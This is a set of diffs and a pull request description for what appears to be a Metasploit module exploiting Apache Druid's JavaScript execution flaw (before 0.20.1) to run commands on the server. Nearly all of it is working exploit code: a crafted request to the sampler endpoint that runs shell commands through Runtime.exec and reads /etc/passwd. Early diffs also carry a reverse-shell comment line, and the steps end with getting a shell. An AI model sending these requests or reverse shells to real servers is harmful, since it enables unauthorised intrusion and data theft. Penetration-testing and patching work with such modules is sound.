-                                                "dimensionsSpec": {},                           #/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp// 0>&1
-                                                "function": "function(){var s = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"#{gencmd}\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"2021-03-28T12:41:27Z\",test: s}}",
-                                                "": {
-                                                        "enabled": "true"
-                                                }
-                                        }
-                                }
-                        }
-                },
-                "samplerConfig": {
-                        "numRows": 10
-                }
-        }.to_json
-        res = send_request_cgi({
-          'method' => 'POST',
-          'uri'    => '/druid/indexer/v1/sampler',
-          'ctype' => 'application/json',
-          'headers' => {
-                'Accept' => 'application/json, text/plain, */*',
-                'Accept-Language' => 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
-                'Connection' => 'keep-alive'
-          },
-          'data' => post_data
-        })
-        return res
+  def execute_command(cmd, _opts = {})
+    gencmd = '/bin/bash`@~-c`@~' + cmd
+    vprint_status("Executing command #{gencmd} ......")
+    post_data = {
+      type: 'index',
+      spec: {
+        ioConfig: {
+          type: 'index',
+          firehose: {
+            type: 'local',
+            baseDir: '/etc',
+            filter: 'passwd'
+          }
+        },
+        dataSchema: {
+          dataSource: '%%DATASOURCE%%',
+          parser: {
+            parseSpec: {
+              format: 'javascript',
+              timestampSpec: {},
+              dimensionsSpec: {},                           # /bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp// 0>&1
+              function: "function(){var s = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"#{gencmd}\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"2021-03-28T12:41:27Z\",test: s}}",
+              "": {
+                enabled: 'true'
+              }
+            }
+          }
+        }
+      },
+      samplerConfig: {
+        numRows: 10
+      }
+    }.to_json
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => '/druid/indexer/v1/sampler',
+      'ctype' => 'application/json',
+      'headers' => {
+        'Accept' => 'application/json, text/plain, */*',
+        'Accept-Language' => 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
+        'Connection' => 'keep-alive'
+      },
+      'data' => post_data
+    })
+    return res
   end
 
   def check
     if datastore['CHECKCMD'].empty?
-      return CheckCode::Unknown("CHECKCMD can not be empty!")
+      return CheckCode::Unknown('CHECKCMD can not be empty!')
     else
-      res = execute_command("#{datastore['CHECKCMD']}")
+      res = execute_command(datastore['CHECKCMD'].to_s)
     end
     unless res
       return CheckCode::Unknown('Connection failed.')
@@ -129,17 +136,18 @@ class MetasploitModule < Msf::Exploit::Remote
     if res.body.include?('data') & res.body.include?('test')
       return CheckCode::Vulnerable("- CMD response! =>\n #{JSON.parse(res.body)['data'][0]['parsed']['test']}")
     end
-      return CheckCode::Unknown("Target seem isn't Apache Druid")
-    end
+
+    return CheckCode::Unknown("Target seem isn't Apache Druid")
+  end
 
   def exploit
     case target['Type']
-      when :linux_dropper
-        execute_cmdstager
-      when :unix_memory
-        execute_command(payload.encoded)
-      end
+    when :linux_dropper
+      execute_cmdstager
+    when :unix_memory
+      execute_command(payload.encoded)
+    end
 
   end
 
- end
+end

--- a/modules/exploits/linux/http/apache_druid_js_rce.rb
+++ b/modules/exploits/linux/http/apache_druid_js_rce.rb
@@ -147,7 +147,6 @@ class MetasploitModule < Msf::Exploit::Remote
     when :unix_memory
       execute_command(payload.encoded)
     end
-
   end
 
 end

--- a/modules/exploits/linux/http/apache_druid_js_rce.rb
+++ b/modules/exploits/linux/http/apache_druid_js_rce.rb
@@ -144,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Vulnerable("- CMD response! =>\n #{JSON.parse(res.body)['data'][0]['parsed']['test']}")
     end
 
-    return CheckCode::Unknown("Target seem isn't Apache Druid")
+    CheckCode::Unknown("Target does not seem to be running Apache Druid")
   end
 
   def exploit

--- a/modules/exploits/linux/http/apache_druid_js_rce.rb
+++ b/modules/exploits/linux/http/apache_druid_js_rce.rb
@@ -15,15 +15,23 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Apache Druid 0.20.0 Remote Command Execution',
         'Description' => %q{
-          Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests.
-          In Druid 0.20.0 and earlier, authenticated user can send a specially-crafted request with json type which set "config" to true .
-          It can forces Druid to run user-provided JavaScript code for that request, regardless of server configuration.
-          More critically,most of Apache Druid don't need to any auth.
-          This can be leveraged to execute code on the target machine with the privileges of the Druid server process.
+          Apache Druid includes the ability to execute user-provided JavaScript code embedded in
+          various types of requests; however, that feature is disabled by default.
+          
+          In Druid versions prior to `0.20.1`, an authenticated user can send a specially-crafted request
+          that both enables the JavaScript code-execution feature and executes the supplied code all
+          at once, allowing for code execution on the server with the privileges of the Druid Server process.
+          More critically, authentication is not enabled in Apache Druid by default.
 
-          Tested Apache Druid 0.15.1/0.16.0-iap8/0.17.1/0.18.0-iap3/0.19.0-iap7/0.20.0-iap4.1/0.21.0-iap3
-          This module add CHECKCMD allow customize the cmd to check,which can replace exec in payloads.
-          The module still exit many bug, for example, cmd/unix/reverse_python can't work well, target sometime will wget/curl many time but I can't find any reason.
+          Tested on the following Apache Druid versions:
+          
+          * 0.15.1
+          * 0.16.0-iap8
+          * 0.17.1
+          * 0.18.0-iap3
+          * 0.19.0-iap7
+          * 0.20.0-iap4.1
+          * 0.21.0-iap3
         },
         'Author' => [
           'Litch1, Security Team of Alibaba Cloud', # Vulnerability discovery

--- a/modules/exploits/linux/http/apache_druid_js_rce.rb
+++ b/modules/exploits/linux/http/apache_druid_js_rce.rb
@@ -17,20 +17,21 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           Apache Druid includes the ability to execute user-provided JavaScript code embedded in
           various types of requests; however, that feature is disabled by default.
-          
+
           In Druid versions prior to `0.20.1`, an authenticated user can send a specially-crafted request
           that both enables the JavaScript code-execution feature and executes the supplied code all
           at once, allowing for code execution on the server with the privileges of the Druid Server process.
           More critically, authentication is not enabled in Apache Druid by default.
 
           Tested on the following Apache Druid versions:
-          
+
           * 0.15.1
           * 0.16.0-iap8
           * 0.17.1
           * 0.18.0-iap3
           * 0.19.0-iap7
           * 0.20.0-iap4.1
+          * 0.20.0
           * 0.21.0-iap3
         },
         'Author' => [
@@ -67,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         ],
         'DefaultTarget' => 0,
-        'Privileged' => true,
+        'Privileged' => false,
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
@@ -77,14 +78,15 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      Opt::RPORT(8888),
-      OptString.new('CHECKCMD', [ true, 'The command to execute as checking vulnerability', 'id'])
+      Opt::RPORT(8888)
     ])
   end
 
   def execute_command(cmd, _opts = {})
-    gencmd = '/bin/bash`@~-c`@~' + cmd
-    vprint_status("Executing command #{gencmd} ......")
+    gencmd = '/bin/sh`@~-c`@~' + cmd
+    genvar = Rex::Text.rand_text_alpha(8..12)
+    genname = Rex::Text.rand_text_alpha(8..12)
+    vprint_status("cmd= #{gencmd}   var=#{genvar}   name=#{genname}")
     post_data = {
       type: 'index',
       spec: {
@@ -97,13 +99,13 @@ class MetasploitModule < Msf::Exploit::Remote
           }
         },
         dataSchema: {
-          dataSource: '%%DATASOURCE%%',
+          dataSource: Rex::Text.rand_text_alpha(8..12),
           parser: {
             parseSpec: {
               format: 'javascript',
               timestampSpec: {},
-              dimensionsSpec: {},                           # /bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp// 0>&1
-              function: "function(){var s = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"#{gencmd}\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"2021-03-28T12:41:27Z\",test: s}}",
+              dimensionsSpec: {},
+              function: "function(){var #{genvar} = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"#{gencmd}\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"#{rand(1..9999999)}\",#{genname}: #{genvar}}}",
               "": {
                 enabled: 'true'
               }
@@ -121,30 +123,28 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype' => 'application/json',
       'headers' => {
         'Accept' => 'application/json, text/plain, */*',
-        'Accept-Language' => 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
-        'Connection' => 'keep-alive'
+        'Accept-Language' => 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'
       },
       'data' => post_data
     })
   end
 
   def check
-    if datastore['CHECKCMD'].empty?
-      return CheckCode::Unknown('CHECKCMD can not be empty!')
-    else
-      res = execute_command(datastore['CHECKCMD'].to_s)
-    end
+    genecho = Rex::Text.rand_text_alphanumeric(16..32).gsub(/A/, 'a')
+    res = execute_command("echo #{genecho}")
     unless res
       return CheckCode::Unknown('Connection failed.')
     end
+
+    vprint_status(res.body)
     unless res.code == 200
       return CheckCode::Safe
     end
-    if res.body.include?('data') && res.body.include?('test')
-      return CheckCode::Vulnerable("- CMD response! =>\n #{JSON.parse(res.body)['data'][0]['parsed']['test']}")
+    if res.body.include?(genecho)
+      return CheckCode::Vulnerable
     end
 
-    CheckCode::Unknown("Target does not seem to be running Apache Druid")
+    CheckCode::Unknown('Target does not seem to be running Apache Druid')
   end
 
   def exploit


### PR DESCRIPTION
This module post json type request to Apache Druid with "config" is set to true, 
and execute command in "function" with Javascript to exploit.
But it seem that some payloads can't execute successfully and no reason,
such as cmd/unix/reverse_python

It has been fixed in Apache Druid 0.20.1
This module has been tested successfully against below:

Apache Druid 0.15.1 Debian 9.11 (Linux 3.10.0-957.21.3.el7.x86_64)

Apache Druid 0.16.0-iap8  Ubuntu 16.04 (Linux 3.10.0-957.27.2.el7.x86_64)

Apache Druid 0.17.1 CentOS 8.2.2004 (Core) (Linux 4.18.0-193.28.1.el8_2.x86_64)

Apache Druid 0.18.0-iap3 Debian 9.12 (Linux 4.19.0-0.bpo.8-amd64)

Apache Druid 0.19.0-iap7 Ubuntu 18.04 (Linux 4.14.193-149.317.amzn2.x86_64)

Apache Druid 0.20.0-iap4.1 Ubuntu 18.04 (Linux 4.19.112+)

Apache Druid 0.21.0-iap3 CentOS 7.9.2009 (Linux 3.10.0-1160.15.2.el7.x86_64)


## Verification


- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/apache_druid_js_rce`
- [ ] `set rhosts <ip>`
- [ ] `set lhost<ip>`
- [ ] `set lport/srvport <ip>` if necessary
- [ ] `run`
- [ ] `You should get a shell`
